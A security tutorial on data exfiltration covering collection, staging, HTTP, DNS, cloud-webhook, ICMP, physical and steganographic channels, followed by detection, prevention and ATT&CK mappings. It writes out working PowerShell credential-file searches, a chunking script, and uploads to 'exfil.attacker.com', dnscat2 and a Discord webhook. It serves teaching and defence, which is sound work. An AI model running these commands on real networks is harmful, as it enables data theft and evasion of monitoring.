Data Exfiltration: Getting the Data Out
Exfiltration is the attacker's payday. All the access, all the credentials, all the lateral movement—it's all leading here. Getting sensitive data out of the network without detection is the final challenge.
The Exfiltration Process
┌─────────────────────────────────────────────────────────────────────────────┐
│ EXFILTRATION STAGES │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ 1. COLLECTION 2. STAGING 3. EXFILTRATION │
│ ───────────── ────────── ─────────────── │
│ │
│ ┌─────────────┐ ┌─────────────┐ ┌─────────────┐ │
│ │ Find data │──────►│ Aggregate │──────►│ Transfer │ │
│ │ - Documents │ │ - Compress │ │ - Encrypt │ │
│ │ - Databases │ │ - Encrypt │ │ - Chunk │ │
│ │ - Emails │ │ - Stage in │ │ - Send via │ │
│ │ - Code │ │ temp loc │ │ covert │ │
│ │ - Secrets │ │ │ │ channel │ │
│ └─────────────┘ └─────────────┘ └─────────────┘ │
│ │
│ 4. CLEANUP │
│ ───────── │
│ ┌─────────────┐ │
│ │ Delete │ Cover tracks, remove staged files, clear logs │
│ │ artifacts │ │
│ └─────────────┘ │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Data Collection
First, find and identify valuable data. What's worth stealing depends on the attacker's goals: espionage, extortion, competitive advantage.
High-Value Data Targets
| Data Type | Common Locations | Value |
|---|---|---|
| Credentials | NTDS.dit, SAM, LSASS, KeePass | Access to more systems |
| Source Code | Git repos, dev servers | IP theft, vulnerability discovery |
| Customer Data | Databases, CRM systems | Ransom, sale on dark web |
| Financial Data | Accounting systems, spreadsheets | Fraud, trading advantage |
| Emails | Exchange, O365, PST files | Intel, blackmail, BEC |
| Strategic Docs | SharePoint, file shares | Competitive advantage |
Finding Sensitive Data
# Search for interesting files
Get-ChildItem -Path C:\ -Recurse -Include *.docx,*.xlsx,*.pdf -ErrorAction SilentlyContinue
# Find files with keywords in name
Get-ChildItem -Path \\server\share -Recurse | Where-Object {
$_.Name -match "password|secret|confidential|private|credential"
}
# Search file contents
Select-String -Path C:\Users\*\Documents\*.txt -Pattern "password"
# Find recently modified files (active projects)
Get-ChildItem -Path \\server\share -Recurse |
Where-Object { $_.LastWriteTime -gt (Get-Date).AddDays(-30) }
# Database connection strings
Select-String -Path C:\inetpub\*.config -Pattern "connectionString"Data Staging
Before exfiltration, data is typically compressed and encrypted to reduce size and avoid content inspection.
# Compress files
Compress-Archive -Path C:\StagedData\* -DestinationPath C:\Temp\data.zip
# Using 7-Zip (if available) with encryption
& 'C:\Program Files\7-Zip\7z.exe' a -pSecretPassword -mhe=on archive.7z C:\StagedData\*
# Split into chunks (evade size-based detection)
$file = [IO.File]::ReadAllBytes("C:\Temp\data.zip")
$chunkSize = 1MB
for ($i = 0; $i -lt $file.Length; $i += $chunkSize) {
$chunk = $file[$i..([Math]::Min($i + $chunkSize - 1, $file.Length - 1))]
[IO.File]::WriteAllBytes("C:\Temp\chunk_$($i / $chunkSize).bin", $chunk)
}Staging Locations
COMMON STAGING LOCATIONS:
Temp directories:
├── C:\Windows\Temp\
├── C:\Users\Public\
├── %TEMP%
└── C:\ProgramData\
Hidden in plain sight:
├── Renamed as legitimate files (.log, .tmp)
├── ADS (Alternate Data Streams)
└── Steganography in imagesExfiltration Channels
The channel determines how data leaves the network. Each has trade-offs between speed, stealth, and reliability.
HTTP/HTTPS
The most common exfiltration channel. Blends with normal web traffic and is rarely blocked outbound.
# PowerShell - Upload via POST
$data = Get-Content C:\Temp\data.zip -Raw -Encoding Byte
$base64 = [Convert]::ToBase64String($data)
Invoke-WebRequest -Uri "https://exfil.attacker.com/upload" -Method POST -Body $base64
# Using curl (if available)
curl -X POST -d @data.zip https://exfil.attacker.com/upload
# Via C2 beacon - data sent as task result
# Most C2 frameworks handle chunking automaticallyDNS Exfiltration
Data encoded in DNS queries. Very slow but extremely covert—DNS is rarely blocked and often not inspected.
# Server (attacker)
ruby dnscat2.rb attacker-domain.com
# Client (victim)
dnscat2.exe attacker-domain.com
# Data encoded in subdomains:
# [base64_chunk].data.attacker-domain.com
# Each query contains ~60 bytes of data
# Slow but works through most firewallsDNS EXFILTRATION METHODS:
SUBDOMAIN ENCODING:
├── Data encoded in subdomain labels
├── xyz123abc.data.attacker.com
├── ~63 chars per label, 253 total
└── Multiple queries for large files
TXT RECORD RESPONSES:
├── Server returns data in TXT records
├── Useful for bidirectional communication
├── Supports larger chunks (~255 bytes)
└── More suspicious than A record queries
TOOLS:
├── dnscat2 - Full tunnel over DNS
├── iodine - IP-over-DNS tunnel
├── DNSExfiltrator - Data exfil focused
└── Cobalt Strike DNS beaconCloud Services
Legitimate cloud services are excellent exfiltration channels—traffic goes to trusted domains and is often encrypted end-to-end.
CLOUD EXFILTRATION CHANNELS:
FILE STORAGE:
├── Dropbox, Google Drive, OneDrive
├── AWS S3 buckets
├── Azure Blob Storage
├── Box, Mega, etc.
└── Often already whitelisted
COMMUNICATION PLATFORMS:
├── Slack (webhook uploads)
├── Discord (webhook uploads)
├── Microsoft Teams
├── Telegram bots
└── Normal business traffic
CODE REPOSITORIES:
├── GitHub (commit file contents)
├── GitLab, Bitbucket
├── Gists (GitHub Gist API)
└── Pastebin-style services
TECHNIQUE:
├── Use API keys (free tier accounts)
├── Encrypted before upload
├── Chunked for size limits
└── Deleted after retrieval# Create Discord server, add webhook
# Webhook URL: https://discord.com/api/webhooks/xxx/yyy
# PowerShell exfil
$webhookUrl = "https://discord.com/api/webhooks/xxx/yyy"
$data = Get-Content C:\Temp\data.txt
$body = @{ content = $data } | ConvertTo-Json
Invoke-RestMethod -Uri $webhookUrl -Method POST -Body $body -ContentType "application/json"
# For files - use multipart form
$file = Get-Item C:\Temp\data.zip
Invoke-RestMethod -Uri $webhookUrl -Method POST -Form @{ file = $file }ICMP & Other Protocols
Data hidden in unexpected protocol fields. ICMP echo (ping) payload is rarely inspected.
COVERT CHANNEL PROTOCOLS:
ICMP:
├── Data in echo request/reply payload
├── ping -p [hex_data] on Linux
├── Slow but works through many firewalls
└── Tools: icmpsh, ptunnel
NTP:
├── Data hidden in NTP packets
├── Port 123 often allowed outbound
└── Unusual but effective
CUSTOM TCP/UDP:
├── Data encoded in headers
├── Sequence numbers
├── Timestamps
├── TCP options fieldsPhysical Exfiltration
Sometimes the easiest way out is physical—USB drives, smartphones, printed documents.
PHYSICAL EXFIL METHODS:
REMOVABLE MEDIA:
├── USB drives (encrypted)
├── External hard drives
├── SD cards (very concealable)
└── CDs/DVDs (outdated but available)
MOBILE DEVICES:
├── Photo/screenshot of screens
├── Tethered phone as network bridge
├── USB data transfer
└── Bluetooth exfil
PRINTED MATERIAL:
├── QR codes on paper (data encoded)
├── Printouts of sensitive documents
├── Screenshots printed
└── Hard to detect digitally
AUDIO/VISUAL:
├── Screen recording
├── Camera capturing screens
├── Ultrasonic data transmission
└── Air-gap jumping techniquesSteganography
Data hidden within innocent-looking files—images, audio, video. The carrier file appears completely normal.
# Hide data in image
steghide embed -cf innocent.jpg -ef secret.txt -p password
# Extract hidden data
steghide extract -sf innocent.jpg -p password
# Image looks completely normal
# Can be uploaded to social media, cloud storage, etc.
# Retrieval: download image, extract dataDetection & Defense
Data exfiltration is the attacker's goal. Strong DLP and network monitoring are critical for detection.
EXFILTRATION DETECTION:
NETWORK MONITORING:
├── Unusual outbound data volumes
├── Connections to rare destinations
├── Off-hours network activity
├── Protocol anomalies (DNS tunneling)
├── Large uploads to cloud services
└── Encrypted traffic to unknown hosts
DLP (Data Loss Prevention):
├── Content inspection (PII, source code)
├── Endpoint DLP agents
├── Email attachment scanning
├── Cloud app monitoring (CASB)
└── USB device control
BEHAVIORAL ANALYSIS:
├── User accessing unusual file shares
├── Mass file downloads
├── Compression/encryption of many files
├── Staging behavior (files in temp)
└── After-hours data access
DNS SPECIFIC:
├── High volume DNS queries
├── TXT record queries to unusual domains
├── Long subdomain strings
├── Queries to newly registered domains
└── DNS-over-HTTPS (DoH) detectionEXFILTRATION PREVENTION:
EGRESS CONTROLS:
├── Whitelist outbound destinations
├── Block direct internet access (proxy required)
├── SSL/TLS inspection
├── Block DNS over HTTPS (DoH)
└── Rate limit outbound connections
ENDPOINT CONTROLS:
├── USB device restrictions
├── Application whitelisting
├── Disable cloud sync clients
├── Screen capture restrictions
├── Clipboard monitoring
DATA CONTROLS:
├── Data classification (know what's sensitive)
├── Encrypt sensitive data at rest
├── Rights management (IRM/DRM)
├── Watermarking for tracking
└── Access logging and alertingMITRE ATT&CK Mapping
T1041
Exfiltration Over C2 Channel - Data sent via existing C2
T1048
Exfiltration Over Alternative Protocol - DNS, ICMP, etc.
T1567
Exfiltration Over Web Service - Cloud storage, code repos
T1052
Exfiltration Over Physical Medium - USB, mobile devices
T1030
Data Transfer Size Limits - Chunked exfiltration
T1029
Scheduled Transfer - Timed exfil to avoid detection